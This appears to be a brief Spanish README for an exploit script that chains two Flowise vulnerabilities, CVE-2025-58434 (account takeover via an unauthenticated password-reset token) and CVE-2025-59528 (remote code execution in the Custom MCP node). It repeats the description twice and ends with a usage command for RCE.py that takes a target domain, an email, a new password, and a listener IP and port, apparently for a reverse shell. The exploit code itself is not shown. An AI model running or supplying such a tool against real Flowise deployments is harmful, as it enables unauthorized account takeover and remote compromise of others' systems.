
CVE-2025-58434 Flowise <= 3.0.5 y anteriores permite la toma de control de cuentas mediante un token de restablecimiento de contraseña no autenticado. CVE-2025-59528 lowiseAI Custom MCP Node Ejecución Remota de Código.
CVE-2025-58434 Flowise <= 3.0.5 y versiones anteriores permite la toma de cuentas a través de un token de recuperación de contraseña no autenticado. CVE-2025-59528 Ejecución remota de código en el nodo Custom MCP de flowiseAI.
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>